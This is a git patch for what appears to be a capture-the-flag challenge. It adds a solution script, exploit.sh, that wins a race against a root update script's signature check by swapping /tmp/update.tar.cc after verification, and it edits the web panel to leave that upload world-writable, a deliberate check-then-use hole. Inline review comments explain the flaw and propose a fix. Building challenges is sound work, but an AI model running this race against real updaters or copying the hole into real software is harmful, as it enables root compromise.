From efef6c0a2d6370a9918c0369a5cc6a23f354d783 Mon Sep 17 00:00:00 2001
From: Giulio
Date: Thu, 24 Sep 2020 01:02:27 +0200
Subject: [PATCH] Update.sh does work; added complete solutions

---
 solution/exploit.sh | 16 ++++++++++++++++
 solution/update.tar.cc | Bin 0 -> 10240 bytes
 update/update.sh | 13 ++++++-------
 webpanel/update.php | 7 ++++---
 4 files changed, 26 insertions(+), 10 deletions(-)
 create mode 100644 solution/exploit.sh
 create mode 100644 solution/update.tar.cc

diff --git a/solution/exploit.sh b/solution/exploit.sh
new file mode 100644
index 0000000..8db813c
--- /dev/null
+++ b/solution/exploit.sh
@@ -0,0 +1,16 @@
+#!/bin/sh
+
+# The solution require the original update.tar.cc in /tmp named 'orig'
+# and the fake package renamed to 'pwn' in /tmp. Both need to have chmod 777
+
+cd /tmp;
+cp orig update.tar.cc;
+chmod 777 update.tar.cc;
+sudo -u upgrade /bin/sh /update.sh > log &
+while true; do
+ if [[ "$(cat log | grep Checking)" ]]; then
+ sleep 0.01
+ cp pwn update.tar.cc;
+ fi
+done;
+
diff --git a/solution/update.tar.cc b/solution/update.tar.cc
new file mode 100644
index 0000000000000000000000000000000000000000..4909928abfa464def08bb7a33155009f97309b02
GIT binary patch
literal 10240
zcmeIyO>crQ90qXC`xM+4CoPofVaX6pBn~zWG0J7ZL8vb%@{$Zc{a|sKW?9@pmn=U2 zOKIA)&F^Uun>cJ1NtF6Q*px0)N>!XOscHykWZ%-d{Va*7T&0|Fs;iPhRF$Zb%r0}B z<5i0+_fuJx_6Em;2fb6{2UGvkr#Q_2F3ZFPE)@QjDEfUkNm5D0g+_o411qk;>zED_!?w>BNIMttmj#t zP^Qa9RXsXhczs7aPMpouwenfK+68^1blhn@Y#sMIolcLM?SU3WPTAELYi8wqH5?RM zZn~bU#qDu05>IWL&#lN_s?FQ9)wK=J2xe<-VNKphX}Y7~Djwd; z(LyaQ9jhDQJZ
literal 0
HcmV?d00001

diff --git a/update/update.sh b/update/update.sh
index 1e141bd..efdffc4 100755
--- a/update/update.sh
+++ b/update/update.sh
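Review bot: The file is declared `#!/bin/sh` but the loop uses the bash-only `[[ … ]]` test, so under a POSIX sh such as dash it stops with a syntax error; either use `#!/bin/bash` or write the test as `if grep -q Checking log; then`. The header comment should also state that the loop waits for the `[+] Checking Signature` line that update/update.sh gains in this same commit, since the solution silently stops working if that message is reworded. Minor wording: `The solution require` should read `The solution requires`.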
@@ -13,30 +13,29 @@ if [[ "$auth" != "$password" ]]; then
 exit 1
 fi
-
 pubkey="/pub.pem"
 file="/tmp/update.tar.cc"
-/bin/chmod 777 $file
+sig="/tmp/sig"
 /bin/echo "### ccOS Update Script ###"
 /bin/echo "[+] Starting"
-/bin/sleep 1
 /bin/echo "[+] Extracting Signature"
 skip=$(expr $(stat -c '%s' $file) - 256)
 if [[ -L $file ]]
 then
 exit 0
 fi
-/bin/dd if=/tmp/update.tar.cc of=sig bs=1 count=256 skip=$skip
+/bin/dd if=/tmp/update.tar.cc of=$sig bs=1 count=256 skip=$skip
 /usr/bin/truncate -s $skip $file
-check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature /tmp/sig $file`
+/bin/echo "[+] Checking Signature"
+check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature $sig $file`
 if [ "$check" == "Verified OK" ]
 then
 /bin/echo "[+] Signature is valid!"
 /bin/echo "[+] Upgrading..."
 /bin/tar -xvf $file -C /
- /bin/rm /tmp/sig
+ /bin/rm $sig
 /bin/echo "[+] Done"
 else
 /bin/echo "[-] Signature error, exiting..."
- /bin/rm /tmp/sig
+ /bin/rm $sig
 fi
diff --git a/webpanel/update.php b/webpanel/update.php
index 95a0bdb..0f3bd43 100644
--- a/webpanel/update.php
+++ b/webpanel/update.php
@@ -5,8 +5,9 @@ require_once("includes/header.php");
 require_once("includes/nav.php");
 if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000 && isset($_POST['password']) && !empty($_POST['password'])) {
- move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tgz.cc');
- exec("/usr/bin/sudo key='".escapeshellarg($_POST['password'])."' /update.sh", $result);
+ move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tar.cc');
+ exec("/bin/chmod 777 /tmp/update.tar.cc");
+ exec("key='".escapeshellarg($_POST['password'])."' /bin/sh -c '/usr/bin/sudo /bin/sh /update.sh'", $result);
 }
 ?>
@@ -19,7 +20,7 @@ if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['
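Review bot: The new `sig="/tmp/sig"` line and the `dd`, `openssl` and `tar` lines all keep working on `/tmp/update.tar.cc`, a path the web panel makes world-writable in this same commit, so the archive can be replaced between the `openssl dgst -verify` check and `/bin/tar -xvf $file -C /`; the `-L` symlink test has the same check-then-use gap, and a fixed `/tmp/sig` name is open to the same interference. The script should copy the upload into a private `mktemp -d` directory right after the symlink check and run the signature split, verification and extraction on that copy, keeping the signature file there as well and removing the directory in both branches instead of `rm $sig`. The added `dd` line also hard-codes `if=/tmp/update.tar.cc` where every other line uses `$file`; it should read `if="$file"`. Everything before `if [[ "$auth" ...` and anything after the closing `fi` is outside the hunk.
```shell
file="/tmp/update.tar.cc"
if [[ -L $file ]]; then exit 0; fi
# Work on a private copy: the upload path is world-writable, so verifying
# and then extracting from it leaves a window in which it can be changed.
work=$(/bin/mktemp -d) || exit 1
/bin/cp -- "$file" "$work/update.tar.cc" || exit 1
file="$work/update.tar.cc"
sig="$work/sig"
# … unchanged: banner echoes, skip= computation …
/bin/dd if="$file" of="$sig" bs=1 count=256 skip="$skip"
# … unchanged: truncate, openssl verify, tar; replace both `rm $sig` with `rm -rf "$work"` …
```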
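Review bot: The return value of `move_uploaded_file()` on the new line is ignored, so when the move fails the script still runs `chmod 777` and the sudo update flow against whatever already sits at `/tmp/update.tar.cc`; guard it with `if (!move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tar.cc')) { exit('upload failed'); }`. The source field also disagrees with the guard: the condition tests `$_FILES['update']` and `$_FILES['upfile']` while the move reads `$_FILES['file']`, which looks like a typo unless the mismatch is a deliberate part of the challenge, in which case a comment should say so. The new `exec("/bin/chmod 777 /tmp/update.tar.cc")` leaves the upload world-writable while update.sh verifies and then extracts from that same path, which is the window the commit's own solution/exploit.sh waits for; if update.sh worked on a private copy, the file would only need to be readable by the updater (`/bin/chmod 644`) and the write bit could go. `escapeshellarg()` already wraps its result in single quotes, so the extra quotes in `key='…'` are redundant.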

    -
  • Please select the file ccOS-ver-xxxx.tgz.cc
  • +
  • Please select the file update.tar.cc
  • The update will take about 2 minutes
  • Updates are cryptographically signed for integrity and authenticity